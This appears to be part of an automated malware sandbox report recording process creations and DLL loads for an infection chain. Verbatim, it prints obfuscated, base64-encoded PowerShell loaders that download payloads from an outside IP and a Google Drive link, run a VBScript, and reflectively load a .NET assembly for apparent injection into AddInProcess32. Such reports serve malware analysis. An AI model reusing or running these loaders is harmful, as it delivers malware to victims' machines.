      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mans504x\mans504x.cmdline"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS"
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD71D.tmp" "c:\Users\user\AppData\Local\Temp\mans504x\CSCCEA378A2A3F7449F819B5EAA6DFD95A.TMP"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )"
      Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
      Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
